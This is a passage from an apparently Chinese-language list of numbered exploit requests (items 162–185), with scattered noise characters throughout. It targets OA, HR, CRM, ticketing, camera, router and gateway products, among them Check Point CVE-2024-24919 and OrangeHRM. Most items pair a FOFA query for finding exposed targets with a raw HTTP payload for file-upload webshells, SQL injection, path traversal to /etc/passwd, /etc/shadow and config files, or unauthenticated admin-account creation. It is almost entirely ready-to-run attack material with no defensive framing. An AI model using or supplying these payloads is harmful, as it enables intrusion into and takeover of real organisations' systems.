</UploadResume>( s8 A9 M+ u2 L( O
</soap:Body>
% U# K! @" b0 Q</soap:Envelope>1 y7 K) A9 c7 p9 i, Q6 x
X1 T1 w$ _0 r: e _8 A, q% y. x* R. K
http://x.x.x.x/dizxdell.aspx
) r* X. d5 S6 a4 Y( _! a
( ^! n1 _' f) r' T7 n9 |162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传- x# L1 V8 o6 A- U. T
FOFA: app="和丰山海-数字标牌"6 h- R; B, V' w6 b1 ^
POST /QH.aspx HTTP/1.16 B! r" i3 o9 Z5 }* u( `
Host: x.x.x.x5 J( J. _) Q* J* }, m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0% S6 d/ M/ \: {+ _% I
Connection: close" s' \) n f2 r f
Content-Length: 583
) w. B/ k* ?7 P! ~* k! _4 GContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey1 M3 M* X$ U2 I$ o, r
Accept-Encoding: gzip h% g, ?9 h+ \/ x: o
; i) d- Z% A( w. a! j+ ^
------WebKitFormBoundaryeegvclmyurlotuey, u0 T2 Q8 A2 v% Q( w; `0 S
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"# }, @" W6 S' r1 d5 t& Q0 L7 M
Content-Type: application/octet-stream$ S2 J, @0 q, S2 t0 O/ [
, O" F: k; b8 ]3 J. W/ \1 x. d<% response.write("ujidwqfuuqjalgkvrpqy") %>
6 H9 @7 [6 A# V$ [2 J m------WebKitFormBoundaryeegvclmyurlotuey
% E3 r v0 \- M! hContent-Disposition: form-data; name="action"
, w* J' K( |5 A" s9 ~+ d) z) _- G" J4 n& V, j' V
upload9 k5 b8 I% N& g
------WebKitFormBoundaryeegvclmyurlotuey) ]2 F9 ], g# u# m- Y
Content-Disposition: form-data; name="responderId"
0 _' `4 ?* S: f S* K- e4 u% O4 x+ t
ResourceNewResponder
1 @5 D Q3 z" L! D& a------WebKitFormBoundaryeegvclmyurlotuey
4 T# r" x( k5 O) p C |/ WContent-Disposition: form-data; name="remotePath"
' B& A. z6 f9 i5 {# [7 K/ ?# \/ V g% g/ ]3 O# b6 z
/opt/resources6 a2 f& c: ]' _8 z; |0 r3 b; G I
------WebKitFormBoundaryeegvclmyurlotuey--! n1 U+ j# M% }" ]6 Y7 ]
! T3 `. i2 T+ Z& T. K. v& Z' w& @: T' H
http://x.x.x.x/opt/resources/kjuhitjgk.aspx$ j/ I6 t: t3 Q+ I; P! u* V) T
# `9 I& ^. w! O6 J, w2 H. G0 [2 |
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传% T7 c* c2 q9 u- {8 I
FOFA: icon_hash="-795291075"/ Q h5 h8 a, ?+ F
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
5 ~7 J4 [& Y" L) _. uHost: x.x.x.x
& T3 J x5 v% f3 C+ |; k8 O; tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36) b+ T% c6 x( [. r3 c) H
Connection: close( W6 R @ J/ y8 C
Content-Length: 2938 z$ y$ P& M4 G6 }+ k* C+ h
Accept: */*5 {" |% F# l9 E. o4 M
Accept-Encoding: gzip, deflate0 k+ V; [9 X$ f; G
Accept-Language: zh-CN,zh;q=0.9
" k/ |! y. ~, K w1 Z& ]6 y3 WContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod; D6 \6 ]4 i0 f+ y
8 X' f7 \ Q8 B+ \- d) R------iiqvnofupvhdyrcoqyuujyetjvqgocod
- y- l ~* p, d2 J# EContent-Disposition: form-data; name="name"5 N4 f2 Y5 K6 c# K1 L' D2 B) T
% t- G( E9 I& W( |9 ?9 r1.php0 m( Z9 u; I9 Y2 Q) P
------iiqvnofupvhdyrcoqyuujyetjvqgocod
. ~9 J" ~! w0 `0 |- Q# x4 N8 Y/ N/ L* ^) GContent-Disposition: form-data; name="upfile"; filename="1.php"
! l2 z# W3 Z& C* z4 A# \Content-Type: image/jpeg& z) y- G% [8 g! P& [
2 ?; A( Y- \5 E0 _rvjhvbhwwuooyiioxega, G; Q' o* ^, {# j# I+ g- v
------iiqvnofupvhdyrcoqyuujyetjvqgocod--5 t& o' }5 Y3 k+ F
3 T) e; p7 U8 }9 V+ J1 [& Y) o3 n% ?' |5 m+ h3 b2 Z
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
0 J5 z' M! y h; A* @, EFOFA: title="智慧综合管理平台登入"
+ W9 Z; Y" o% P% g3 P: v- lPOST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
& j( F3 Y: m3 g9 {+ ]Host: x.x.x.x5 O X) [3 Z% I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0; f: p# e6 h# Z+ C2 W4 ~- `
Content-Length: 288& a- {. }' {# V- S; M; k
Accept: application/json, text/javascript, */*; q=0.01
9 ` z$ C0 |5 SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
3 x6 K0 x' q8 c: O9 vConnection: close5 ^/ ^$ q2 B! S' T* x" n! n6 }9 A1 F+ ^
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
! @+ o( J- M# J: _" e; YX-Requested-With: XMLHttpRequest
" \# n3 ~* _5 lAccept-Encoding: gzip
; S1 g5 Y0 d! F X! f) W9 ?+ C* x" K* C0 n
------dqdaieopnozbkapjacdbdthlvtlyl+ M+ g8 d% z' Q D
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"! e/ b1 T6 Y$ K8 T. q9 c9 I
Content-Type: image/jpeg2 r: y1 m. g6 B# T6 ]! X% I B- S
* ]; a8 [5 `! T4 i6 B3 E* \! m* b<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
% o) W. A3 R G, k------dqdaieopnozbkapjacdbdthlvtlyl--
# Y/ d" |1 M5 L( {3 U5 c& F$ F5 P/ d
$ x- S" k. x& i4 t7 Z1 d( ehttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
. G, q6 h: G' \+ q( A( s8 B0 @# Y& E* x+ `
165. OrangeHRM 3.3.3 SQL 注入
$ B& B. Z2 G# p+ C$ |9 q+ c- m! d% LCVE-2024-36428: J0 g# _4 e8 ]% o1 U
FOFA: app="OrangeHRM-产品"5 z5 F: R0 ^' W3 }' [) p0 l8 F
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))' A; B5 q K7 a- f0 \8 f# C
$ B, P% K; k5 i) w# U) M
& ?! d& a$ @1 Q) t166. 中成科信票务管理平台SeatMapHandler SQL注入! ], a) M6 V4 |" h
FOFA:body="技术支持:北京中成科信科技发展有限公司"" @& i; n, u; X3 r% b4 {" N
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
3 h' u1 a; E6 f/ N/ l# jHost:
) O3 y1 t8 Y% W. ~6 BPragma: no-cache. w( t5 R7 y( T8 U1 X% K) e7 k7 y
Cache-Control: no-cache
- F3 @; C, \2 {; x) b! x' x$ eUpgrade-Insecure-Requests: 1
% u8 N" B8 b; oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
8 O7 o# Z. S( r, q/ oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! _* H: U% v2 \: ^) R# T( B) H5 X* }* qAccept-Encoding: gzip, deflate' K/ X k- R! q& V9 L% r
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8# E; u* z3 Y* `- k
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
( a: ~; a0 |& Z" K5 m$ g$ XConnection: close) T0 {6 `, P" ?! T0 R+ y$ _1 W
Content-Type: application/x-www-form-urlencoded
h* l# u5 Q1 |8 s& q- `Content-Length: 89
6 j/ M$ x4 ]" N$ b4 e" v+ f2 P, W3 X: L; I G% J
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
8 m- c; Y$ w7 ^! D- V6 h! B
) u: P% C9 m1 U
8 k E5 `, g2 X( c3 D! u. c5 ^1 v4 w167. 精益价值管理系统 DownLoad.aspx任意文件读取
. B* L {. k+ o7 v# n) wFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
& a, c! f' r4 B1 B O, v: }GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
6 s+ x: }5 i5 ?- U/ z) O D5 KHost:8 o; g7 E0 z L+ S8 o% S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 h9 d* P1 l3 P5 @/ o9 e. @9 }Content-Type: application/x-www-form-urlencoded6 {% H/ Z$ G& W j s! u/ I# w
Accept-Encoding: gzip, deflate
0 k- D6 J& r9 z. E5 }Accept: */*: E8 c( Z+ ^, W) Z, a; i8 C
Connection: keep-alive
; ~( u* v3 @* A \
: C1 q+ i# }, g7 v: v
6 F7 X! K" f* Z* Z0 S. d: a' p# p) q168. 宏景EHR OutputCode 任意文件读取
/ ]) U: O# D5 i* x. dFOFA:app="HJSOFT-HCM"' x; v, E3 s8 T& F( q
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
* j: _/ {+ ?* HHost: your-ip
* T+ ^, A+ G# I/ N, n+ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
2 ~2 P( ?8 y/ V# g* o1 M6 t* LContent-Type: application/x-www-form-urlencoded
6 p; E1 r7 M6 d2 ~Connection: close2 ]7 y7 M y( p$ }9 h' e8 N
6 ]9 z0 ^! \! H: m
. M2 @7 V5 P5 s+ d
. b5 R0 ~4 W+ l169. 宏景EHR downlawbase SQL注入) g! e9 K3 L0 a8 u9 V' N
FOFA:app="HJSOFT-HCM"& z. b$ r# Z# i/ s! k& j/ k2 j0 t
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1* U3 t: R! [# _: J* m O7 k/ j
Host: your-ip7 ]& D. A* L) R9 i" ? f2 A& |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 N7 P( c: c4 K3 }/ V5 |Accept: */*% Y) o4 }1 |/ z. H
Accept-Encoding: gzip, deflate
4 \* O7 x7 Y' oConnection: close4 l% _9 _' F) Z
3 y( E* q7 G. T2 B$ o" [/ T
! Z3 f- g2 O; K2 b9 {* H) T$ B! d
b7 i! X, W: e- [170. 宏景EHR DisplayExcelCustomReport 任意文件读取+ ]! t9 J8 K" g1 g0 R2 ]
FOFA:body="/general/sys/hjaxmanage.js"8 Z! v" A* t2 K
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
" X6 ?0 q! P% l, j$ d$ X, VHost: balalanengliang
5 ^1 X9 S; c- r LUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 X6 v% v1 [ t# K
Content-Type: application/x-www-form-urlencoded3 x* N/ e. P* L
- T* t; k1 f9 e- k$ Q. wfilename=../webapps/ROOT/WEB-INF/web.xml
) A) n2 E( U1 o, L: U Y7 \+ K$ a' S
5 o; `) v2 C7 I171. 通天星CMSV6车载定位监控平台 SQL注入' g# d; o- v1 G8 y/ N! u
FOFA:body="/808gps/"
" m% g9 X4 F7 rGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.16 V7 F9 M* \% \7 L- J
Host: your-ip
# s& J8 w/ r; n" D$ ^5 fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
/ A% Z% A/ y/ \* f) w+ EAccept: */*
( X/ ~1 O+ f/ L4 zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' W3 h: Q6 q# U8 D6 O6 ^6 o6 X8 sAccept-Encoding: gzip, deflate
$ i, M1 f0 y( W2 VConnection: close5 ?1 _1 J+ N0 o& Q: l
& a$ }* Y! m3 w; K8 q, y% I
( L3 U9 M$ J! F/ ]( _4 V9 z g, x& i9 e! T2 @) V
172. DT-高清车牌识别摄像机任意文件读取$ H; o2 P* o3 u
FOFA:app="DT-高清车牌识别摄像机"
& X& m8 [5 p1 eGET /../../../../etc/passwd HTTP/1.1
* j( I, l. K* ]$ C& u1 [# MHost: your-ip
7 q/ O8 h! r3 Z; F, hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 z9 M- m' t( K) o5 h) PAccept-Encoding: gzip, deflate
* {& r/ b9 `' X: ]% l4 Z- ?Accept: */*1 C E4 g* S9 {6 R+ p8 F$ C( P4 [
Connection: keep-alive0 r" `" t& a. Q3 P% O0 r
2 U, K7 r* b- B, p8 i
. u: f6 W7 a) Y9 ^: h0 H
; i, N5 Z8 K5 }3 ~7 s173. Check Point 安全网关任意文件读取
+ F4 E# i7 s' S$ q. w1 W% t9 kCVE-2024-24919$ v; I! F/ J6 b6 V' z5 c, V/ s
FOFA:app="Check_Point-SSL-Network-Extender"
8 ~% X$ I. I8 ?6 D9 ^% G. H7 iPOST /clients/MyCRL HTTP/1.1
, L1 I$ X+ i( P+ j( R" D4 eHost: your-ip# w7 T; F( d( @) Z& N
Content-Type: application/x-www-form-urlencoded1 R+ n1 V0 }* L0 o! F6 X$ C
4 U, a$ p$ j$ {: GaCSHELL/../../../../../../../etc/shadow
0 b* \0 j4 ~% D. Z# q/ W4 T. m+ e- K) |" t" A
( i( C. p4 z0 Y0 M3 D7 @
' }9 F% C2 F3 H4 i9 ~/ ]174. 金和OA C6 FileDownLoad.aspx 任意文件读取
9 a, I' Z: w0 A o$ z6 l0 VFOFA:app="金和网络-金和OA"; O) F3 ?( m9 a+ l3 {: _
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
c" P+ {& u* c* L! K1 \9 f) bHost: your-ip
% K6 N, L" {. H" l( T! o4 ~3 XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.360 I+ v( E0 A3 T! D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" y1 G5 [; S# X) j) p' V: m- R
Accept-Encoding: gzip, deflate, br8 p( N8 [7 I, V& F! K# ~ J) K
Accept-Language: zh-CN,zh;q=0.9! C. o2 R7 ?! |: r, Y9 ^! c
Connection: close& k$ n+ v, J3 W! b5 y& ] L/ D
4 o* F; o1 {! l( C
% E$ u1 N4 b$ z- \+ E; g4 z5 A- m
" r. e0 z* d5 p175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
& f' E- B5 s o7 v3 X( JFOFA:app="金和网络-金和OA". q' X) R: V% }% i" X0 b
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.18 ?) F7 N# A3 V C" y
Host:, v$ q& ^" |1 e
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
# S! b( z) C* t3 ^) G7 W( BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Y6 s5 t. [* L. ?. ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 C* `5 U$ e9 uAccept-Encoding: gzip, deflate( l8 h4 C0 L5 [4 B7 L! J: k
Connection: close) h* t- \9 j k
Upgrade-Insecure-Requests: 17 X4 S' e! j) E* N- l1 M1 v) U; k. q0 M
3 s9 ^# g! o- Y
7 x) X( _9 B& u/ ^- ^9 q: Z6 h3 d
176. 电信网关配置管理系统 rewrite.php 文件上传
Y# J, U p- x8 C0 VFOFA:body="img/login_bg3.png" && body="系统登录"
3 i9 B7 X2 `6 v4 i, L2 EPOST /manager/teletext/material/rewrite.php HTTP/1.14 \7 Q9 r+ N: X9 m
Host: your-ip; I5 ~$ \/ \+ x6 o
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0) R' K2 U2 z2 S! ]; y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT% i6 A3 \9 m# F6 R0 K( ]$ l
Connection: close+ T( C5 ^" T2 c) E
% Z3 H: O& ^% W$ H; d------WebKitFormBoundaryOKldnDPT2 @ _! h6 U! }: G: ^
Content-Disposition: form-data; name="tmp_name"; filename="test.php": j4 j- P- G; y' v y/ t3 {. C7 g6 ]
Content-Type: image/png
0 {: K' M3 \/ m, X2 M* W# y 7 R" U5 O. F2 f1 c6 N& S3 a$ S# \
<?php system("cat /etc/passwd");unlink(__FILE__);?> l1 {5 A# {# m% f3 R0 L' C
------WebKitFormBoundaryOKldnDPT
9 N e- Z1 h4 V) o) R7 R4 iContent-Disposition: form-data; name="uploadtime"
5 D. X) X$ d" z# s0 B ( q D6 ~( K8 [% H4 _6 p) g
* S0 m/ C% F" Z/ X& g( g# f' x% Z------WebKitFormBoundaryOKldnDPT--
- a5 K$ H' _, y% E8 p/ V" n' [8 F) y1 u* H, ^1 i
% |. R( q' l8 W. a* ]
$ c* v' D% G9 Y+ o* v) y
177. H3C路由器敏感信息泄露2 @7 ~% a4 o, ]7 B- _+ d5 e
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg8 Q {) N! H0 C- Z/ ^
/userLogin.asp/../actionpolicy_status/../M60.cfg$ f8 C' h2 d. X( Z8 L8 p9 A# F
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/ ?2 K5 j' m2 C5 Y0 P/userLogin.asp/../actionpolicy_status/../GR5200.cfg
N8 J1 v9 A9 u/userLogin.asp/../actionpolicy_status/../GR3200.cfg
- u4 ]' @$ [* i7 I: ]- W/userLogin.asp/../actionpolicy_status/../GR2200.cfg8 x8 g/ z E$ {3 H
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* w: g! o8 @- K- A0 f7 G8 F
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg, X0 B! ^4 O5 b1 {% o! b/ A7 b
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg: P: p, p1 [" S% }
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
) b& }# a9 ]% e/ Y/userLogin.asp/../actionpolicy_status/../ER5200.cfg( Q4 G! j4 u# u4 A$ I
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
' _* W3 k* | S/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg1 G9 [- L; U) _8 ^& S" u. a' O
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
, F- ?0 F0 v0 B; w/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg6 K9 M2 i6 ~; i$ {% |( e {
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
q v& k7 } E7 h/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
W9 h- y+ {- m* z4 }( K& P/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
" S" _: f( R+ }: B/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
$ N# n7 L9 `- R" h, {' v/userLogin.asp/../actionpolicy_status/../ER3100.cfg
7 h+ p& g2 W! a" \! z: v/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
$ E0 a4 }$ e) ?. z5 i8 g9 F' }
+ a( P- R6 h% h0 H, b( t0 `. Q- `. s7 k. a2 E
178. H3C校园网自助服务系统-flexfileupload-任意文件上传3 U( h5 A9 [1 p6 \9 a. s: w, Y" B
FOFA:header="/selfservice"1 p2 I+ M, d7 R3 g3 U2 ~# l7 t
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1; m6 C9 t, n# w! n
Host:
. b7 k7 W4 ]) O* w" iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; j3 o& |( [# B1 g! c
Content-Length: 2529 Q! {7 }; A9 r
Accept-Encoding: gzip, deflate
& M3 I' Q, Q3 O7 @" I# n, H1 lConnection: close
( T J$ W- S- c9 y1 x6 d2 TContent-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
: C, e9 A: j J2 Z# I1 M-----------------aqutkea7vvanpqy3rh2l- j; Q. ?9 }) S V% f& d
Content-Disposition: form-data; name="12234.txt"; filename="12234", ]& [: v1 V3 E+ ~' u4 {
Content-Type: application/octet-stream8 L8 k/ R# F; v; j1 ^
Content-Length: 255
& A1 n% l+ i) e- |2 p" |' {0 n( z8 E2 ]/ a
122340 |/ A# P7 S: ?4 k# C7 w- ~
-----------------aqutkea7vvanpqy3rh2l--
* w5 X* K) j4 n2 M9 e# Q% `
( r9 R8 p% y# O2 h+ \4 |: h
R$ b8 T: |+ E5 F3 sGET /imc/primepush/%2e%2e/flex/12234.txt
/ f- }. F" Z( V) C. b; L5 G% \' o3 S/ G0 N$ d& |, e
; x" C' N" @1 E" ^7 W
179. 建文工程管理系统存在任意文件读取* i M, Q" U) u. Z; t& b
POST /Common/DownLoad2.aspx HTTP/1.1" n4 Z! [/ [% M- B7 m2 A
Host: {{Hostname}}
$ u/ B5 u* r: V' t( R, sContent-Type: application/x-www-form-urlencoded/ D: R) a" Y- B \0 {4 w2 E+ t) K
User-Agent: Mozilla/5.04 U: _6 G" x9 v$ e8 L% V: x
$ [) s5 k1 I7 I; B% kpath=../log4net.config&Name=
5 R& v, J0 m; t C, @( p
) d* W/ L. e6 V! n1 ]% H1 V8 x1 |0 x; K( K& j
180. 帮管客 CRM jiliyu SQL注入
7 m: W7 S; h# n$ ^1 V; R- c PFOFA:app="帮管客-CRM"
6 e6 `- D2 |7 }- d+ L+ X BGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
- u+ b: `0 T, E/ z7 \Host: your-ip- k* P/ l& y& x* ^: S0 X9 b) s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36% b7 K* F& g6 g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 {6 Z# e# l {) uAccept-Encoding: gzip, deflate
. ~5 |; H" u; ]8 w$ mAccept-Language: zh-CN,zh;q=0.9# A( w2 Q7 l* X) X1 F
Connection: close
B& Y! G8 x S3 M- s- a; e/ e. n* k6 a, s: Z1 \
8 D9 [1 c' A* ^3 |( j' Z+ x
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入0 q$ |, J* w6 H" G. s
FOFA:"PDCA/js/_publicCom.js"
7 |. u C) N) [3 s7 SPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1, _; k3 F; p6 c0 ^, F) M
Host: your-ip2 i2 n# g* J3 M0 ?. t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
9 R0 [1 w( P& R( |% M# {* \Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ A: \( M5 i) x- X- EAccept-Encoding: gzip, deflate, br; j+ H8 v% I* p+ V/ F( V
Accept-Language: zh-CN,zh;q=0.9/ B6 c O' x G0 Q h; i
Connection: close
+ Z: ^$ S2 E g2 ^; z- A" ZContent-Type: application/x-www-form-urlencoded
# O" P$ B/ O0 i; i, k0 [8 L! n) G4 e* s4 _) n
# k1 u b* `+ y7 z) Haction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=209 N" e/ J/ t& S
& g: l) {& ~8 l- ?
7 g# E3 i. ?0 {5 G6 m182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建9 n9 a& ^( Z7 z" F8 h: m. G" s
FOFA:"PDCA/js/_publicCom.js"" n& r0 \; B4 j* e4 b
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1" V0 S) X7 ^! D" z3 Q
Host: your-ip7 k: D, ?6 c% W' x9 T8 t) W) e. [2 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.363 E& A/ _2 @7 _ M; H9 ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
( q! A$ E5 g8 Z7 x* `3 h: R5 sAccept-Encoding: gzip, deflate, br, k/ f5 W) V) a D. j8 p, ~& s
Accept-Language: zh-CN,zh;q=0.9+ U5 D0 F' q) ^& x5 I. r( X
Connection: close6 N2 N" t( q$ f& l
Content-Type: application/x-www-form-urlencoded
/ `, _& h9 V+ F0 E0 b+ }5 {
9 T4 C4 N( c$ E1 P4 ~; g3 j' c' \- N
3 k# ^* L, T& ^- ]( w6 Iusername=test1234&pwd=test1234&savedays=1+ u; G$ q& o1 a' q+ t
" K4 L4 f7 w7 T. Q K! R' P
. T! C, ?6 O1 q* O. ~183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入: ]- B( u: ]5 N) j- H
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"+ e2 D1 W7 z' J: w, x/ | o0 u
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.14 A' E9 F' n4 o
Host: your-ip. N4 X+ G0 ]1 f, E3 {
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
( z1 N ~# F2 \* {Accept-Charset: utf-8
0 ?) r2 X4 Q' A5 {Accept-Encoding: gzip, deflate- w3 V; n7 e( n7 C- q
Connection: close
( ?% a2 R1 [! K; P
, u! m) t* ~# \4 g+ v
2 f* j+ W4 D) U3 ?184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加% V7 v: d, d/ V: Y
FOFA:server="SunFull-Webs"# V6 [ K; b) o
POST /soap/AddUser HTTP/1.15 [4 i2 V4 P D8 x& C
Host: your-ip: L; g: k8 y4 w. w5 v( q6 {. @$ t# L
Accept-Encoding: gzip, deflate
3 I# ?7 N5 N8 x# r& o1 zUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.02 I4 r4 m5 [3 T" l7 ^% \
Accept: application/xml, text/xml, */*; q=0.01' p7 G7 z, N) o& u6 _
Content-Type: text/xml; charset=utf-8
+ y+ \7 h! ^4 |5 D B7 { e( \Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 ?2 y1 P. j) q) O6 Q) yX-Requested-With: XMLHttpRequest
# ?4 \, A* W" r: ~: x- C. X _+ Z' x( I
" S; N, z! F' m7 t' p" W7 |, v
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56'). C& y; U+ b7 M( ^. Y$ {$ l4 R
! U2 [5 Z. i S9 _" A
7 b, V/ k2 L) T185. 瑞友天翼应用虚拟化系统SQL注入
, k$ o$ x4 O* Xversion < 7.0.5.1
( e, ^# {- @, `+ x! eFOFA:app="REALOR-天翼应用虚拟化系统"9 b. {& |* _# F, D
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
2 m2 p$ T/ G, U; H( v/ C! zHost: host- p, e0 N& `% P$ ]0 t" t* _2 K
